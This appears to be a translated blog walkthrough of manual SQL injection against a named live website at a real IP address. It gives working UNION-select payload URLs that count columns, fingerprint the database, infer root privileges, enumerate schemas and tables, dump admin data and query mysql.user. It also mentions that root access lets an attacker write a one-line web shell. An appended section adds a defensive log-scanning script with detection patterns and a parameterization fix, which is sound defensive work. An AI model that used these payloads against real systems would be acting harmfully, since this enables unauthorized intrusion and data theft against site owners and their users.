Injection point: http://203.246.61.24/ipsi/sub05/sub09_A.php?menu=109
Use ORDER BY to determine the number of fields (columns)
ORDER BY 25: error
ORDER BY 23: returns normally
ORDER BY 24: try it
OK: ORDER BY 25 gives an error and ORDER BY 24 returns normally, so the number of fields is 24.
Next, use a UNION query to retrieve the database name, passwords, and so on.
Use database() to view the name of the current database
Use version() to view the version number
Use @@datadir to view the path to the database files
Use user() to view the user
Use system_user() to view the system user
Use current_user() to view the currently connected user
Haha, there it is. MySQL also has remote login enabled, so it seems someone has already been in here; remote login is not enabled by default.
Use session_user() to see the user of the current session
Use and ord(mid(user(),1,1))=114 to check what privileges the user has
OK, the page returned is different from the page shown on error, so the first character of the user name is 'r' (ASCII 114), that is, root privileges
That is good: as long as you know the absolute path, you can write a one-line shell to the server
First use @@version_compile_os to see what the operating system is
Query information_schema to see which databases exist
http://203.246.61.24/ipsi/sub05/sub09_A.php?menu=109%20and%201=2%20union%20select%201,2,3,4,5,group_concat%28distinct+table_schema%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20information_schema.columns--
That is a lot of databases. Next come the table names of the current database:
http://203.246.61.24/ipsi/sub05/sub09_A.php?menu=109%20and%201=2%20union%20select%201,2,3,4,5,group_concat%28distinct+table_name%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20information_schema.tables%20where%20table_schema=database%28%29--
Haha, simple enough, all the table names come out.
With the database name and table names dumped, the next step is to dump the column names:
http://203.246.61.24/ipsi/sub05/sub09_A.php?menu=109%20and%201=2%20union%20select%201,2,3,4,5,group_concat%28distinct+column_name%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20information_schema.columns+where+table_name=0x61646d696e5f6d656e75
Note: 0x61646d696e5f6d656e75 is the hex encoding of admin_menu, one of the table names dumped above
Use
http://203.246.61.24/ipsi/sub05/sub09_A.php?menu=109%20and%201=2%20union%20select%201,2,3,4,5,group_concat%28admin_id,0x2b,allow_menu%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20admin_menu
This dumps the contents, but they are not the administrator's account and password.
But the method is the same:
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from mysql.user
http://203.246.61.24/ipsi/sub05/sub09_a.php?menu=109%20and%201=2%20union%20select%201,2,3,4,5,@@version_compile_os,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20mysql.user
Manual injection against a Korean site
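From the defender's side, every stage of the walkthrough above leaves a recognizable trace in the web server's access log. The following is an added example, not part of the original post: it URL-decodes each request and labels the stage it matches. The log lines, path and client addresses are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Stage name -> pattern, matched against the URL-decoded, lower-cased query string.
STAGES = [
    ("column_count_probe", re.compile(r"\border\s+by\s+\d+")),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("schema_enumeration", re.compile(r"\binformation_schema\b|\bmysql\.user\b")),
    ("fingerprinting", re.compile(
        r"@@\w+|\b(database|version|user|system_user|current_user|session_user)\s*\(\s*\)")),
    ("boolean_probe", re.compile(r"\bord\s*\(\s*mid\s*\(")),
    ("hex_literal", re.compile(r"\b0x[0-9a-f]{4,}\b")),
]

# Common/combined log format: client IP first, request line in double quotes.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation addresses, hypothetical path).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /app/list.php?menu=109 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /app/list.php?menu=109%20order%20by%2025 HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Jan/2024:10:01:30 +0000] "GET /app/list.php?menu=109%20and%20ord%28mid%28user%28%29,1,1%29%29=114 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:02:12 +0000] "GET /app/list.php?menu=109%20and%201=2%20union%20select%201,2,3,4,5,group_concat%28distinct+table_name%29,7%20from%20information_schema.tables%20where%20table_schema=database%28%29-- HTTP/1.1" 200 6044',
    '203.0.113.9 - - [01/Jan/2024:10:03:00 +0000] "GET /app/list.php?menu=110 HTTP/1.1" 200 5001',
]

def classify(url):
    """Return the stage names whose pattern appears in the decoded query string."""
    query = unquote_plus(urlsplit(url).query).lower()
    query = re.sub(r"\s+", " ", query)  # collapse whitespace runs before matching
    return [name for name, rx in STAGES if rx.search(query)]

def scan(lines):
    """Map client IP -> sorted list of stages seen across all of its requests."""
    seen = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        stages = classify(m.group(2))
        if stages:
            seen.setdefault(m.group(1), set()).update(stages)
    return {ip: sorted(stages) for ip, stages in seen.items()}

if __name__ == "__main__":
    for ip, stages in scan(SAMPLE_LOG).items():
        print(ip, stages)
```

Because the `menu` parameter is numeric, the underlying fix is on the application side: accept only an integer for it and bind it through a parameterized query, so that log matching of this kind serves as detection rather than as the control.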